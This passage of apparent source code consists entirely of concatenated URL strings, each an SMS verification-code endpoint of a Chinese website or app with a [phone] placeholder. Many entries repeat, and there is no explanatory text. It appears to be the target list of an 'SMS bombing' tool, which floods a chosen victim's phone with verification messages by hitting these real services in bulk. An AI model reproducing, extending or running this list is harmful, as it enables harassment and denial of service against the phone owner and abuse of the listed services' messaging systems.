"http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=23", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.yuyin-tv.com/v1/account/verifycode/register?phone=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=希沃学院SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://open.leju.com/game/member/sendcode.html?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.id68.cn/member/common/ckuser/ m=mobile&a=isMobile&format=ajax&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584431770018", + "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.metromall.cn/user/MobileCode.aspx?randnum=&Phone=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102009139976025888258_1433746978224&captcha_code=7998&_=1433746978226&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", + "http://passport.jcard.cn/Service/AjaxSendCodeService.aspx?doType=sendextcode&_=1445158370&mobile=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "http://www.huizhuang.com/m/login/getmobilecode?cate=login&mobile=[phone]&_=1551173567935", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.baixing.com/oz/verify/reg?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=您的短信验证码是:%verifycode%。您的手机号正在�%", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://i.360.cn/smsApi/sendsmscode?condition=2&r=&callback=&account=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://www.cgv.com.cn/mem/getRegCapCha.fo?MOBILE_NO=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.moonreader.cn:80/mreader/common/sendMobile.do?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + 